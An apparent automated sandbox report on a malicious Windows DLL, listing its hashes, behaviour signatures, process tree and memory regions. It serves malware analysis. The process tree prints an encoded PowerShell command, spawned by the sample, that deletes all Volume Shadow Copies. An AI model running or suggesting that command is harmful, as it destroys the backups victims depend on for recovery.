Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:58
Static task
static1
Behavioral task
behavioral1
Sample
d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
Resource
win10-en-20211208
General
-
Target
d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
-
Size
166KB
-
MD5
46a10b1e1fe68e124c86ee237751fd44
-
SHA1
78f29761f7f0f57a8f92e5f23d9e4d2d6465e848
-
SHA256
d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff
-
SHA512
c0fbd92fcb136fd5376efba041d4170eccd8bae219812ef00dfc7edfe26f06b651153bdfa2b01d648ebbbc6901c3205790c26a037f85625c0722173d843e633a
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\N: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 948 rundll32.exe 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 948 rundll32.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeBackupPrivilege 832 vssvc.exe Token: SeRestorePrivilege 832 vssvc.exe Token: SeAuditPrivilege 832 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 1612 wrote to memory of 948 1612 rundll32.exe rundll32.exe PID 948 wrote to memory of 1376 948 rundll32.exe powershell.exe PID 948 wrote to memory of 1376 948 rundll32.exe powershell.exe PID 948 wrote to memory of 1376 948 rundll32.exe powershell.exe PID 948 wrote to memory of 1376 948 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:788
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/948-55-0x0000000075F81000-0x0000000075F83000-memory.dmpFilesize
8KB
-
memory/1376-56-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmpFilesize
8KB
-
memory/1376-57-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmpFilesize
11.4MB
-
memory/1376-59-0x0000000002420000-0x0000000002422000-memory.dmpFilesize
8KB
-
memory/1376-61-0x0000000002424000-0x0000000002427000-memory.dmpFilesize
12KB
-
memory/1376-60-0x0000000002422000-0x0000000002424000-memory.dmpFilesize
8KB
-
memory/1376-58-0x000000001B830000-0x000000001BB2F000-memory.dmpFilesize
3.0MB
-
memory/1376-62-0x000000000242B000-0x000000000244A000-memory.dmpFilesize
124KB